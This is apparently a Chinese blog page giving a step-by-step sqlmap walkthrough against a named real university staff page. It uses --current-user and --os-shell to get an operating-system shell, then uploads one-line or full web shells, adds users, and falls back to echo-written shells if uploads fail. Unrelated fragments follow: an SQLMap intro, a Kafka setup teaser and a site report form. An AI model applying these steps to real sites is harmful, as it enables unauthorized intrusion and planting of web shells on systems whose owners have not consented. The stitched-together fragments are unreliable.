过程:
D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --curren
t-user
必须是root权限
D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --os-shell
这里根据网站的实际情况来选择脚本语言
添加网站路径(必须的)
进入os_shell模式成功 就可以写shell了,分2种情况
1.可以看到带路径的直接访问这个路径地址
2.如果可以添加用户 也可以直接在下面输入命令添加
打开地址
上传一句话到目录就可以了
注:如果一句话之类的被拦截或者无法回显,可以测试直接上传大马
如果大马也失败的话 可以利用echo命令
一、说明SQLMAP是一个用于测试SQL注入问题的强大工具,工具有很多可用的选项,使用sqlmap -hh可以看到具体的说明,其可用的选项进行了分类,包括Target、Request、Optimization、Injection、Detection、Techniques、Fingerprint、Enumeration、Brute force、User-deficed function inject
SQLMap入门
linux虚拟机搭建Kafka集群环境 文章目录linux虚拟机搭建Kafka集群环境一、环境准备一、Kafka安装1、打开三台虚拟机2、用Xshell连接,并选择【发送键输入到所有会话】3、在【/opt】下创建kafka文件夹4、下载kafka [官网下载地址](http://kafka.apache.org/downloads)5、解压【kafka_2.13-2.8.0.tgz】6、修改【se
举报文章
请选择举报类型
补充说明
0/200
上传截图
格式支持JPEG/PNG/JPG,图片不超过1.9M
